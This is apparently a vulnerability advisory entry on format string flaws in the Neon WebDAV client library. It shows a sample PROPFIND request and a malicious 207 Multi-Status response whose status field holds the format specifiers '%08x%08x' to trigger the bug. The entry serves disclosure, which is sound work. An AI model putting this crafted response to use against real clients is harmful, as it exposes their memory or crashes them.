|
Neon WebDAV Client Library Format String Vulnerabilities
It has been reported that the following XML request/response sequence will be sufficient to trigger this issue: Request - ------- PROPFIND /example/resource/string/ HTTP/1.1 Pragma: no-cache Cache-control: no-cache Accept: text/*, image/jpeg, image/png, image/*, */* Accept-Encoding: x-gzip, gzip, identity Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5 Accept-Language: en Host: www.example.com Depth: 0 Response - -------- HTTP/1.1 207 Multi-Status X-Cocoon-Version: 2.1 Set-Cookie: JSESSIONID=cookie_data; Path=/example Content-Type: text/xml Transfer-Encoding: chunked <?xml version="1.0" encoding="UTF-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>/lenya/blog/authoring/entries/2003/08/24/peanuts/</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>%08x%08x</D:status> </D:propstat> </D:response> </D:multistatus> |
|
|
Privacy Statement |
